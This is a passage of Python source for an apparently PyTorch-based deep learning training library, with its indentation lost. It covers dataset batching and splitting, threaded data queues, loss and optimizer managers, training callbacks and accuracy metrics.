self.batch_argument_generator = self.create_batch_argument_generator()
def create_batch_argument_generator(self):
"""
This is an iterator that generates the necessary arguments needed to
create each batch. By default, it will generate indicies from an index
array
# Note:
This will raise a NotImplementedError if we don't have an index
array, since we can't generate batch indicies if we don't know
what our indicies are. If your dataset does not have indicies,
you'll have to implement this yourself.
If you implement this yourself, note that the output must be an
iterable of all the arguments your dataset's create_batch method
needs.
"""
if self.index_array is None:
raise NotImplementedError()
while True:
# Shuffle if we need to
if self.shuffle:
np.random.shuffle(self.index_array)
for i in range(0, len(self.index_array), self.batch_size):
if self.replace:
yield (np.random.choice(self.index_array, self.batch_size,
True), )
else:
yield (self.index_array[i:i + self.batch_size], )
def __next__(self):
# This is a critical section, so we lock when we need the next indicies
if self.index_array is not None:
with self.lock:
batch_arguments = next(self.batch_argument_generator)
else:
batch_arguments = tuple([])
# print("Batch Arguments: ", batch_arguments[0])
return self.dataset.create_batch(*batch_arguments)
def toggle_shuffle(self):
self.shuffle = not self.shuffle
def restart(self):
self.batch_argument_generator = self.create_batch_argument_generator()
class BatchPyGenerator(BatchGenerator):
"""
A BatchGenerator that generates using a python iterator.
# Arguments:
pygen -- the python iterator from which to generate batches
steps_per_epoch -- The number of iterations in one epoch
"""
def __init__(self, pygen, steps_per_epoch):
super(BatchPyGenerator, self).__init__(steps_per_epoch)
self.pygen = pygen
def __iter__(self):
return self.pygen
def __next__(self):
return next(self.pygen)
class NpDataset(Dataset):
"""
A Dataset that is built from numpy data.
# Arguments
x -- The input data as a numpy array
y -- The target data as a numpy array (optional)
"""
# TODO define the kfold method for NpDataset
def __init__(self, x, y=None, ids=None):
super(NpDataset, self).__init__()
self.x = x
self.y = y
self.ids = ids
assert isinstance(self.x, np.ndarray), "x must be a numpy array."
if self.y is not None:
assert isinstance(self.y, np.ndarray), "y must be a numpy array " \
"or None."
if self.ids is not None:
assert isinstance(self.ids, np.ndarray), "ids must be a numpy " \
"or None."
self.output_labels = self.has_labels
if self.has_labels:
assert len(self.x) == len(
self.y), ("Data and labels must have same number of" +
"samples. X has shape ", len(x), " and Y has shape ",
len(y), ".")
if self.has_ids:
assert len(self.x) == len(
self.ids), ("Data and ids must have same number of" +
"samples. X has shape ", len(x),
" and ids has shape ", len(ids), ".")
def __len__(self):
return len(self.x)
@property
def has_ids(self):
return self.ids is not None
@property
def has_labels(self):
return self.y is not None
def toggle_labels(self):
self.output_labels = not self.output_labels
def create_batch(self, batch_indicies):
outputs = [
self.x[batch_indicies],
]
if self.output_labels:
outputs.append(self.y[batch_indicies])
if not self.output_labels:
return outputs[0]
return outputs[0], outputs[1]
@staticmethod
def get_stratified_split_indicies(split, shuffle, seed, stratify_by):
if shuffle:
if seed is not None:
np.random.seed(seed)
# Get all the unique output labels
unq_labels = np.unique(stratify_by, axis=0)
val_splits = []
train_splits = []
for unq_label in unq_labels:
# Find where the entire output label matches the unique label
if stratify_by.ndim == 1:
label_mask = stratify_by == unq_label
else:
non_batch_dims = tuple(range(1, stratify_by.ndim))
label_mask = np.all(stratify_by == unq_label,
axis=non_batch_dims)
# Get the indicies where the label matches
label_inds = np.where(label_mask)[0]
if shuffle:
np.random.shuffle(label_inds)
split_ind = int(split * len(label_inds))
val_splits.append(label_inds[:split_ind])
train_splits.append(label_inds[split_ind:])
train_split = np.concatenate(train_splits, axis=0)
val_split = np.concatenate(val_splits, axis=0)
# Shuffle one more time to get the labels shuffled
if shuffle:
np.random.shuffle(train_split)
np.random.shuffle(val_split)
return train_split, val_split
def get_split_indicies(self, split, shuffle, seed, stratified,
stratify_by):
if stratified:
if stratify_by is None:
stratify_by = self.y
assert stratify_by is not None, "Data must have labels to " \
"stratify by."
assert len(stratify_by) == len(self), "Labels to stratify by " \
"have same length as the dataset."
if shuffle:
if seed is not None:
np.random.seed(seed)
if stratified:
train_split, val_split = self.get_stratified_split_indicies(
split, shuffle, seed, stratify_by)
else:
# Default technique of splitting the data
split_ind = int(split * len(self))
val_split = slice(split_ind)
train_split = slice(split_ind, None)
if shuffle:
indicies = np.random.permutation(len(self))
train_split = indicies[train_split]
val_split = indicies[val_split]
return train_split, val_split
def get_kfold_indices(self, k, shuffle, seed):
if shuffle:
if seed is not None:
np.random.seed(seed)
indicies = np.random.permutation(len(self))
else:
indicies = np.arange(len(self))
for i in range(k):
split = 1.0 / k
# Default technique of splitting the data
split_start = int(i * split * len(self))
split_end = int((i + 1) * split * len(self))
val_split = slice(split_start, split_end)
train_split_a = indicies[0:split_start]
train_split_b = indicies[split_end:]
if shuffle:
train_split_a = indicies[train_split_a]
train_split_b = indicies[train_split_b]
val_split = indicies[val_split]
yield np.concatenate([train_split_a, train_split_b]), val_split
def validation_split(self,
split=0.2,
shuffle=False,
seed=None,
stratified=False,
stratify_by=None):
"""
Splits the NpDataset into two smaller datasets based on the split
Args:
split (float, optional): The fraction of the dataset to make
validation. Defaults to 0.2.
shuffle (bool, optional): Whether or not to randomly sample the
validation set and train set from the parent dataset. Defaults
to False.
seed (int, optional): A seed for the random number generator.
Defaults to None.
stratified (bool, optional): Whether or not to sample the
validation set to have the same label distribution as the whole
dataset. Defaults to False.
stratify_by (np.ndarray, optional): A 1D array of additional labels
to stratify the split by. Defaults to None. If none is provided
will use the actual labels in the dataset. This is useful if
you want to stratify based on some other property of the data.
Returns:
(tuple): A train dataset with (1-split) fraction of the data and a
validation dataset with split fraction of the data
Note:
Shuffling the dataset will at one point cause double the size of
the dataset to be loaded into RAM. If this is an issue, I suggest
you store your dataset on disk split up into validation and train
so you don't do this splitting in memory.
"""
train_split, val_split = self.get_split_indicies(
split, shuffle, seed, stratified, stratify_by)
train_data = self.__class__(
self.x[train_split],
y=None if not self.has_labels else self.y[train_split],
ids=None if not self.has_ids else self.ids[train_split])
val_data = self.__class__(
self.x[val_split],
y=None if not self.has_labels else self.y[val_split],
ids=None if not self.has_ids else self.ids[val_split])
return train_data, val_data
def kfold(self, k=5, shuffle=False, seed=None):
"""
An iterator that yields one fold of the kfold split of the data
# Arguments:
k -- The number of folds to use. Default: 5
shuffle -- Whether or not to randomly sample the validation set
and train set from the parent dataset. Default: False
seed -- A seed for the random number generator (optional).
# Yields
A train dataset with 1-1/k fraction of the data and a validation
dataset with 1\k fraction of the data. Each subsequent validation
set contains a different region of the entire dataset. The
intersection of each validation set is empty and the union of each
is the entire dataset.
# Note
Shuffling the dataset will at one point cause double the size of
the dataset to be loaded into RAM. If this is an issue, I suggest
you store your dataset on disk split up into validation and train
so you don't do this splitting in memory. You can set the
destroy_self flag to True if you can afford the split, but want to
reclaim the memory from the parent dataset.
"""
for train_split, val_split in self.get_kfold_indices(k, shuffle, seed):
train_data = NpDataset(
self.x[train_split],
y=None if not self.has_labels else self.y[train_split],
ids=None if not self.has_ids else self.ids[train_split])
val_data = NpDataset(
self.x[val_split],
y=None if not self.has_labels else self.y[val_split],
ids=None if not self.has_ids else self.ids[val_split])
yield train_data, val_data
### TRAINING ###
class GeneratorEnqueuer(BatchGenerator):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
"""
def __init__(self, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") and hasattr(
generator, "batch_size"):
super(GeneratorEnqueuer, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size)
else:
logging.warning(
"Input generator does not have a steps_per_epoch or batch_size "
"attribute. Continuing without them.")
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.wait_time = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
self.wait_time = wait_time
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
self._threads.append(
threading.Thread(target=data_generator_task))
self._threads[-1].start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def __next__(self):
if not self.is_running():
raise ValueError(
"Generator must be running before iterating over it")
while True:
if not self.queue.empty():
return self.queue.get()
else:
# print("Waiting...")
time.sleep(self.wait_time)
class TrainingLogs(dict):
def __init__(self):
super().__init__()
self.epoch_logs = {}
self.batch_logs = {}
def on_epoch_begin(self):
self.epoch_logs = {}
self.batch_logs = {}
def log_metric(self, metric, score):
self.batch_logs[metric.__name__] = score.item()
self.epoch_logs[metric.__name__] = metric.accumulate()
def on_epoch_end(self):
for metric_name, score in self.epoch_logs.items():
self.setdefault(metric_name, []).append(score)
def log_validation_metric(self, metric):
self.epoch_logs["val_" + metric.__name__] = metric.accumulate()
class LossManager(object):
@resettable
def __init__(self):
self.__loss_names = []
self.__loss_input_dict = {}
self.__loss_weight_dict = {}
self.__loss_dict = {}
self.__verify_loss_args = True
self.__loss_scores = {}
def __len__(self):
return len(self.__loss_names)
@property
def names(self):
return list(self.__loss_names)
def _compute_single_loss(self, model, targets, name):
# Cache the score for logging
self.__loss_scores[name] = self.__loss_weight_dict[name] * \
self.__loss_dict[name](
*[getattr(model, loss_input) for loss_input
in self.__loss_input_dict[name]],
targets
)
return self.__loss_scores[name]
def verify_args(self, model):
for loss_name, loss_inputs in self.__loss_input_dict.items():
for loss_input in loss_inputs:
if not hasattr(model, loss_input):
raise AttributeError(
"Model does not have attribute {loss_input}, which"
" is an input for the loss {loss_name}".format(
loss_input=loss_input, loss_name=loss_name))
def loss(self, model, targets):
# This means we need to verify that the input arguments for the loss
# exist, and notify the user if they don't
if self.__verify_loss_args:
self.verify_args(model)
self.__verify_loss_args = False
# Compute the loss
return sum(self._compute_single_loss(model, targets, loss_name) for
loss_name in self.__loss_names)
def get_loss_score(self, name=None):
if name is None:
assert not len(self.__loss_names), "Need to specify a loss if " \
"using multiple losses."
name = self.__loss_names[0]
return self.__loss_scores[name]
def add_loss(self, loss_fn, inputs, weight=1.0, name=None):
if name is None:
name = "loss_{}".format(len(self.__loss_dict))
self.__loss_dict[name] = loss_fn
self.__loss_input_dict[name] = inputs
self.__loss_weight_dict[name] = weight
self.__loss_names.append(name)
def remove_loss(self, name=None):
if name is None:
name = self.__loss_names.pop()
else:
self.__loss_names.remove(name)
loss_fn = self.__loss_dict.pop(name)
inputs = self.__loss_input_dict.pop(name)
weight = self.__loss_weight_dict.pop(name)
return {"name": name,
"loss": loss_fn,
"inputs": inputs,
"weight": weight}
def clear_losses(self):
self.reset()
class OptimizerManager(object):
@resettable
def __init__(self):
self.__optimizer_names = []
self.__optimizer_dict = {}
def __len__(self):
return len(self.__optimizer_names)
@property
def names(self):
return list(self.__optimizer_names)
@property
def optimizers(self):
return list(self.__optimizer_dict.values())
def add_optimizer(self, optimizer, name=None):
if name is None:
name = "optimizer_{}".format(len(self))
self.__optimizer_dict[name] = optimizer
self.__optimizer_names.append(name)
def remove_optimizer(self, name=None):
if name is None:
name = self.__optimizer_names.pop()
else:
self.__optimizer_names.remove(name)
optimizer = self.__optimizer_dict.pop(name)
return {"name": name,
"optimizer": optimizer}
def clear_optimizers(self):
self.reset()
### REGISTRY ###
METRICS_REGISTRY = {}
def register_metric(name, metric):
metric.__name__ = name
METRICS_REGISTRY[name] = metric
def load_metric(name):
return METRICS_REGISTRY[name]
### CALLBACKS ###
class CallbackList(object):
"""Container abstracting a list of callbacks.
# Arguments
callbacks: List of `Callback` instances.
queue_length: Queue length for keeping
running statistics over callback execution time.
"""
def __init__(self, callbacks=None, queue_length=10):
callbacks = callbacks or []
self.callbacks = [c for c in callbacks]
self.queue_length = queue_length
def append(self, callback):
self.callbacks.append(callback)
def set_params(self, params):
for callback in self.callbacks:
callback.set_params(params)
def set_model(self, model):
for callback in self.callbacks:
callback.set_model(model)
def on_epoch_begin(self, epoch, logs=None):
"""Called at the start of an epoch.
# Arguments
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_epoch_begin(epoch, logs=logs)
self._delta_t_batch = 0.
self._delta_ts_batch_begin = deque([], maxlen=self.queue_length)
self._delta_ts_batch_end = deque([], maxlen=self.queue_length)
def on_epoch_end(self, epoch, logs=None):
"""Called at the end of an epoch.
# Arguments
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_epoch_end(epoch, logs=logs)
def on_batch_begin(self, step, epoch, logs=None):
"""Called right before processing a batch.
# Arguments
batch: integer, index of batch within the current epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_begin(step, epoch, logs=logs)
self._delta_ts_batch_begin.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_begin)
if (self._delta_t_batch > 0.
and delta_t_median > 0.95 * self._delta_t_batch
and delta_t_median > 0.1):
warnings.warn('Method on_batch_begin() is slow compared '
'to the batch update (%f). Check your callbacks.' %
delta_t_median)
self._t_enter_batch = time.time()
def on_batch_end(self, step, epoch, logs=None):
"""Called at the end of a batch.
# Arguments
batch: integer, index of batch within the current epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
if not hasattr(self, '_t_enter_batch'):
self._t_enter_batch = time.time()
self._delta_t_batch = time.time() - self._t_enter_batch
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_end(step, epoch, logs=logs)
self._delta_ts_batch_end.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_end)
if (self._delta_t_batch > 0.
and (delta_t_median > 0.95 * self._delta_t_batch
and delta_t_median > 0.1)):
warnings.warn('Method on_batch_end() is slow compared '
'to the batch update (%f). Check your callbacks.' %
delta_t_median)
def on_train_begin(self, logs=None):
"""Called at the beginning of training.
# Arguments
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_train_begin(logs=logs)
def on_train_end(self, logs=None):
"""Called at the end of training.
# Arguments
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_train_end(logs=logs)
def __iter__(self):
return iter(self.callbacks)
class Callback(object):
"""Abstract base class used to build new callbacks.
# Properties
params: dict. Training parameters
(eg. verbosity, batch size, number of epochs...).
model: instance of `keras.models.Model`.
Reference of the model being trained.
The `logs` dictionary that callback methods
take as argument will contain keys for quantities relevant to
the current batch or epoch.
Currently, the `.fit()` method of the `Sequential` model class
will include the following quantities in the `logs` that
it passes to its callbacks:
on_epoch_end: logs include `acc` and `loss`, and
optionally include `val_loss`
(if validation is enabled in `fit`), and `val_acc`
(if validation and accuracy monitoring are enabled).
on_batch_begin: logs include `size`,
the number of samples in the current batch.
on_batch_end: logs include `loss`, and optionally `acc`
(if accuracy monitoring is enabled).
"""
def __init__(self):
self.validation_data = None
def set_params(self, params):
self.params = params
def set_model(self, model):
self.model = model
def on_epoch_begin(self, epoch, logs=None):
pass
def on_epoch_end(self, epoch, logs=None):
pass
def on_batch_begin(self, step, epoch, logs=None):
pass
def on_batch_end(self, step, epoch, logs=None):
pass
def on_train_begin(self, logs=None):
pass
def on_train_end(self, logs=None):
pass
class ProgressBar(Callback):
def __init__(self, steps, epochs=0):
super(ProgressBar, self).__init__()
self.steps = steps
self.epochs = epochs
self.last_step = 0
self.progbar = None
def on_epoch_begin(self, epoch, logs=None):
if self.epochs:
print("Epoch {curr}/{total}".format(curr=epoch + 1,
total=self.epochs))
# Create a new progress bar for the epoch
self.progbar = tqdm(total=self.steps)
self.last_step = 0
# Store the logs for updating the postfix
self.epoch_logs = logs
def on_batch_end(self, step, epoch, logs=None):
self.progbar.set_postfix(self.epoch_logs)
self.progbar.update(step - self.last_step)
self.last_step = step
def on_epoch_end(self, epoch, logs=None):
self.epoch_logs = logs
self.progbar.set_postfix(logs)
# 0 because we've already finished all steps
self.progbar.update(0)
self.progbar.close()
class ModelCheckpoint(Callback):
"""Save the model after every epoch.
`filepath` can contain named formatting options,
which will be filled the value of `epoch` and
keys in `logs` (passed in `on_epoch_end`).
For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
then the model checkpoints will be saved with the epoch number and
the validation loss in the filename.
# Arguments
filepath: string, path to save the model file.
monitor: quantity to monitor.
monitor_val: whether or not to monitor the validation quantity.
verbose: verbosity mode, 0 or 1.
save_best_only: if `save_best_only=True`,
the latest best model according to
the quantity monitored will not be overwritten.
mode: one of {auto, min, max}.
If `save_best_only=True`, the decision
to overwrite the current save file is made
based on either the maximization or the
minimization of the monitored quantity. For `val_acc`,
this should be `max`, for `val_loss` this should
be `min`, etc. In `auto` mode, the direction is
automatically inferred from the name of the monitored quantity.
save_weights_only: if True, then only the model's weights will be
saved (`model.save_weights(filepath)`), else the full model
is saved (`model.save(filepath)`).
period: Interval (number of epochs) between checkpoints.
"""
def __init__(self, filepath, monitor, verbose=0,
save_best_only=False,
mode='auto', period=1):
super(ModelCheckpoint, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.filepath = filepath
self.save_best_only = save_best_only
self.period = period
self.epochs_since_last_save = 0
if mode not in ['auto', 'min', 'max']:
warnings.warn('ModelCheckpoint mode %s is unknown, '
'fallback to auto mode.' % (mode),
RuntimeWarning)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
self.best = np.Inf
elif mode == 'max':
self.monitor_op = np.greater
self.best = -np.Inf
else:
if 'acc' in self.monitor or 'auc' in self.monitor or 'iou' in self.monitor or self.monitor.startswith('fmeasure'):
self.monitor_op = np.greater
self.best = -np.Inf
else:
self.monitor_op = np.less
self.best = np.Inf
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
filepath = self.filepath.format(epoch=epoch)
if self.save_best_only:
current = logs[self.monitor]
if current is None:
warnings.warn('Can save best model only with %s available, '
'skipping.' % self.monitor, RuntimeWarning)
else:
if self.monitor_op(current, self.best):
if self.verbose > 0:
print('Epoch %05d: %s improved from %0.5f to %0.5f,'
' saving model to %s'
% (epoch, self.monitor, self.best,
current, filepath))
self.best = current
self.model.save_state(filepath)
else:
if self.verbose > 0:
print('Epoch %05d: %s did not improve' %
(epoch, self.monitor))
else:
if self.verbose > 0:
print('Epoch %05d: saving model to %s' % (epoch, filepath))
self.model.save_state(filepath)
class Plotter(Callback):
def __init__(self, monitor, scale='linear', plot_during_train=True, save_to_file=None, block_on_end=True):
super().__init__()
if plt is None:
raise ValueError("Must be able to import Matplotlib to use the Plotter.")
self.scale = scale
self.monitor = monitor
self.plot_during_train = plot_during_train
self.save_to_file = save_to_file
self.block_on_end = block_on_end
if self.plot_during_train:
plt.ion()
self.fig = plt.figure()
self.title = "{} per Epoch".format(self.monitor)
self.xlabel = "Epoch"
self.ylabel = self.monitor
self.ax = self.fig.add_subplot(111, title=self.title,
xlabel=self.xlabel, ylabel=self.ylabel)
self.ax.set_yscale(self.scale)
self.x = []
self.y_train = []
self.y_val = []
def on_train_end(self, logs=None):
if self.plot_during_train:
plt.ioff()
if self.block_on_end:
plt.show()
return
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.x.append(len(self.x))
self.y_train.append(logs[self.monitor])
self.y_val.append(logs["val_" + self.monitor])
self.ax.clear()
# # Set up the plot
self.fig.suptitle(self.title)
self.ax.set_yscale(self.scale)
# Actually plot
self.ax.plot(self.x, self.y_train, 'b-', self.x, self.y_val, 'g-')
self.fig.canvas.draw()
# plt.pause(0.5)
if self.save_to_file is not None:
self.fig.savefig(self.save_to_file)
return
class MetricLogger(Callback):
def __init__(self, log_fname):
super().__init__()
self.log_fname = log_fname
def on_epoch_end(self, epoch, train_logs=None, val_logs=None):
train_logs = train_logs or {}
val_logs = val_logs or {}
# Write the info to the log
with open(self.log_fname, 'a') as log_file:
print("Epoch: %s" % epoch, file=log_file)
if len(train_logs) > 0:
print("Train", file=log_file)
for metric, values in train_logs.items():
print("\t{}: {}".format(metric, values[-1]), file=log_file)
if len(val_logs) > 0:
print("Val", file=log_file)
for metric, values in val_logs.items():
print("\t{}: {}".format(metric, values[-1]), file=log_file)
print("", file=log_file)
class ReduceLROnPlateau(Callback):
"""Reduce learning rate when a metric has stopped improving.
Models often benefit from reducing the learning rate by a factor
of 2-10 once learning stagnates. This callback monitors a
quantity and if no improvement is seen for a 'patience' number
of epochs, the learning rate is reduced.
# Example
```python
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
patience=5, min_lr=0.001)
model.fit(X_train, Y_train, callbacks=[reduce_lr])
```
# Arguments
optimizer: the pytorch optimizer to modify
monitor: quantity to be monitored.
monitor_val: whether or not to monitor the validation quantity.
factor: factor by which the learning rate will
be reduced. new_lr = lr * factor
patience: number of epochs with no improvement
after which learning rate will be reduced.
verbose: int. 0: quiet, 1: update messages.
mode: one of {auto, min, max}. In `min` mode,
lr will be reduced when the quantity
monitored has stopped decreasing; in `max`
mode it will be reduced when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
epsilon: threshold for measuring the new optimum,
to only focus on significant changes.
cooldown: number of epochs to wait before resuming
normal operation after lr has been reduced.
min_lr: lower bound on the learning rate.
"""
def __init__(self, optimizer, monitor, monitor_val=True, factor=0.1, patience=10,
verbose=0, mode='auto', epsilon=1e-4, cooldown=0, min_lr=0):
super(ReduceLROnPlateau, self).__init__()
self.optimizer = optimizer
self.monitor = monitor
self.monitor_val = monitor_val
if factor >= 1.0:
raise ValueError('ReduceLROnPlateau '
'does not support a factor >= 1.0.')
self.factor = factor
self.min_lr = min_lr
self.epsilon = epsilon
self.patience = patience
self.verbose = verbose
self.cooldown = cooldown
self.cooldown_counter = 0 # Cooldown counter.
self.wait = 0
self.best = 0
self.mode = mode
self.monitor_op = None
self._reset()
def _reset(self):
"""Resets wait counter and cooldown counter.
"""
if self.mode not in ['auto', 'min', 'max']:
warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '
'fallback to auto mode.' % (self.mode),
RuntimeWarning)
self.mode = 'auto'
if (self.mode == 'min' or
(self.mode == 'auto' and 'acc' not in self.monitor)):
self.monitor_op = lambda a, b: np.less(a, b - self.epsilon)
self.best = np.Inf
else:
self.monitor_op = lambda a, b: np.greater(a, b + self.epsilon)
self.best = -np.Inf
self.cooldown_counter = 0
self.wait = 0
def on_train_begin(self, logs=None, **kwargs):
self._reset()
def on_epoch_end(self, epoch, train_logs=None, val_logs=None):
logs = val_logs if self.monitor_val else train_logs
logs = logs or {}
current = logs.get(self.monitor)[-1]
if current is None:
warnings.warn(
'Reduce LR on plateau conditioned on metric `%s` '
'which is not available. Available metrics are: %s' %
(self.monitor, ','.join(list(logs.keys()))), RuntimeWarning
)
else:
if self.in_cooldown():
self.cooldown_counter -= 1
self.wait = 0
if self.monitor_op(current, self.best):
self.best = current
self.wait = 0
elif not self.in_cooldown():
if self.wait >= self.patience:
reduced_lr = False
for param_group in self.optimizer.param_groups:
old_lr = param_group['lr']
if old_lr > self.min_lr:
param_group['lr'] = max(old_lr * self.factor, self.min_lr)
reduced_lr = True
if reduced_lr:
self.cooldown_counter = self.cooldown
self.wait = 0
if self.verbose > 0:
print('\nEpoch %05d: ReduceLROnPlateau reducing learning rate by %s factor.' % (
epoch + 1, self.factor))
self.wait += 1
def in_cooldown(self):
return self.cooldown_counter > 0
class LRScheduler(Callback):
def __init__(self, optimizer, schedule, verbose=0):
super().__init__()
self.optimizer = optimizer
self.schedule = schedule
self.verbose = verbose
def on_epoch_begin(self, epoch, train_logs=None, val_logs=None):
new_lr = self.schedule(epoch)
for param_group in self.optimizer.param_groups:
param_group['lr'] = new_lr
if self.verbose > 0:
print('\nEpoch %05d: LRScheduler setting lr to %s.' % (epoch + 1, new_lr))
"""
METRICS
Files Included:
__init__.py
abstract_metrics.py
accuracy_metrics.py
Missing Files:
segmentation_metrics.py
"""
class Metric(object):
"""
The abstract metric that defines the metric API. Some notes on it:
- Passing a function of the form `metric(y_pred, y_true)` to an abstract
metric will use that function to calculate the score on a batch.
- The accumulate method is called at the end of each batch to calculate the
aggregate score over the entire epoch thus far.
- See `AverageMetric` for an example what an accumulate method might
look like.
- The reset method is called at the end of each epoch or validation run. It
simply overwrites the attributes of the metric with its attributes at
initialization.
Metrics are callable like any fuction and take as input:
```
batch_score = metric(y_pred, y_true)
```
where `y_true` are the labels for the batch and `y_pred` are the
predictions
To implement your own custom metric, override the `score` function and
the `accumulate` function. If you just want to average the scores over
the epoch, consider using `AverageMetric` and just overriding the `score`
function.
"""
def __init__(self, metric_func=None):
self.metric_func = metric_func
self.__name__ = self.__class__.__name__.lower() \
if metric_func is None else metric_func.__name__
self.__original_dict__ = None
def __call__(self, y_pred, y_true):
"""
Makes the metric a callable function. Used by some metrics to perform
some overhead work like checking validity of the input, or storing
values like batch size or input shape.
"""
# Save the original dict on the first call
if self.__original_dict__ is None:
self.__original_dict__ = copy.deepcopy(self.__dict__)
# Default metric will just score the predictions
return self.score(y_pred, y_true)
def score(self, y_pred, y_true):
"""
Calculates the metric score over a batch of labels and predictions.
Args:
y_pred: The predictions for the batch
y_true: The labels for the batch
Returns:
The metric score calculated over the batch input as a scalar
torch tensor.
"""
if self.metric_func is not None:
return self.metric_func(y_pred, y_true)
else:
raise NotImplementedError()
def accumulate(self):
"""
"""
raise NotImplementedError()
def reset(self):
if self.__original_dict__ is not None:
self.__dict__ = copy.deepcopy(self.__original_dict__)
return self
class AverageMetric(Metric):
"""
An abstract metric that accumulates the batch values from the metric
by averaging them together. If any function is input into the fit
function as a metric, it will automatically be considered an AverageMetric.
"""
def __init__(self, metric_func=None):
super(AverageMetric, self).__init__(metric_func=metric_func)
self.metric_sum = 0.
self.sample_count = 0
def __call__(self, y_pred, y_true):
assert y_true.size(0) == y_pred.size(0), "Batch Size of labels and" \
"predictions must match for AverageMetric."
score = super(AverageMetric, self).__call__(y_pred, y_true)
self.sample_count += y_pred.size(0)
self.metric_sum += (score.item() * y_pred.size(0))
return score
def accumulate(self):
return self.metric_sum / self.sample_count
class Accuracy(AverageMetric):
"""
Computes the accuracy over predictions
Args:
None
Returns:
An accuracy metric that can maintain its own internal state.
Inputs:
y_pred (torch.FloatTensor): A 2D Float Tensor with the predicted
probabilites for each class.
y_true (torch.LongTensor): A 1D torch LongTensor of the correct classes
Outputs:
A scalar tensor equal to the accuracy of the y_pred
"""
def score(self, y_pred, y_true):
# Expect output and target to be B x 1 or B x C or target can be
# B (with ints from 0 to C-1)
assert y_pred.dim() == 2, "y_pred should be a 2-dimensional tensor"
total = y_true.size(0)
# Turn it into a 1d class encoding
if y_true.dim() == 2:
if y_true.size(1) > 1:
raise NotImplementedError(
"Multiclass with 2d targets is not impelemented yet")
y_true = y_true.squeeze(1).long()
# Change the y_pred to have two cols if it only has 1
if y_pred.size(1) == 1:
# Want to consider the 0.5 case
y_pred = (y_pred >= 0.5).float()
y_pred = torch.cat([1 - y_pred, y_pred], dim=1)
# Compute the accuracy
_, predicted = torch.max(y_pred, 1)
correct = (predicted == y_true).float().sum(0)
return (correct / total) * 100.
class AccuracyWithLogits(Accuracy):
"""An accuracy metric that takes as input the logits. See `Accuracy` for
more details.
"""
def score(self, y_pred, y_true):
if y_pred.dim() == 2 and y_pred.size(1) > 1:
y_pred = F.softmax(y_pred, dim=1)
else:
y_pred = torch.sigmoid(y_pred)
return super().score(y_pred, y_true)
class TopKAccuracy(Accuracy):
"""Computes the precision@k for the specified values of k
Args:
k (int): The k to calculate precision@k (topk accuracy)
Returns:
A TopKAccuracy metric that can maintain its own internal state.
Inputs:
y_pred (torch.FloatTensor) A 2D Float Tensor with the predicted
probabilites for each class.
y_true (torch.LongTensor) A 1D torch LongTensor of the correct classes
Outputs:
A scalar tensor equal to the topk accuracy of the y_pred
"""
def __init__(self, k=3):
super().__init__()
self.k = k
def score(self, y_pred, y_true):
assert y_true.dim() == y_pred.dim() - 1 == 1
channel_dim = 1
batch_size = y_true.size(0)
# Check to see if there's only 1 channel (then its binary
# classification)
if y_pred.size(channel_dim) == 1:
y_pred = y_pred.squeeze(channel_dim) # B x ...
# 2 x B x ... -> B x 2 x ...
y_pred = y_pred.stack([1 - y_pred, y_pred]).t()
# Get the indicies of the topk along the channel dim
_, pred = y_pred.topk(self.k, channel_dim, True, True) # B x k x ...
pred = pred.t() # k x B x ...
# target: B -> 1 x B -> k x B x ...
correct = pred.eq(y_true.view(1, -1).expand_as(pred))
correct_k = correct[:self.k].view(-1).float().sum(0)
# Accumulate results
return 100. * correct_k / batch_size
accuracy = Accuracy()
accuracy_with_logits = AccuracyWithLogits()
top2_accuracy = TopKAccuracy(2)
top3_accuracy = TopKAccuracy(3)
top5_accuracy = TopKAccuracy(5)
register_metric('accuracy', accuracy)
register_metric('accuracy_with_logits', accuracy_with_logits)
register_metric('top2_accuracy', top2_accuracy)
register_metric('top3_accuracy', top3_accuracy)
register_metric('top5_accuracy', top5_accuracy)
"""
MODELS
"""
python_iterables = {list, set, tuple, frozenset}
def peek(iterable):
try:
first = next(iterable)
except StopIteration:
return None
return first, itertools.chain([first], iterable)
def standardize_list_input(inputs):
if type(inputs) in python_iterables:
return list(inputs)
return [inputs]
def standardize_metric_input(metrics):
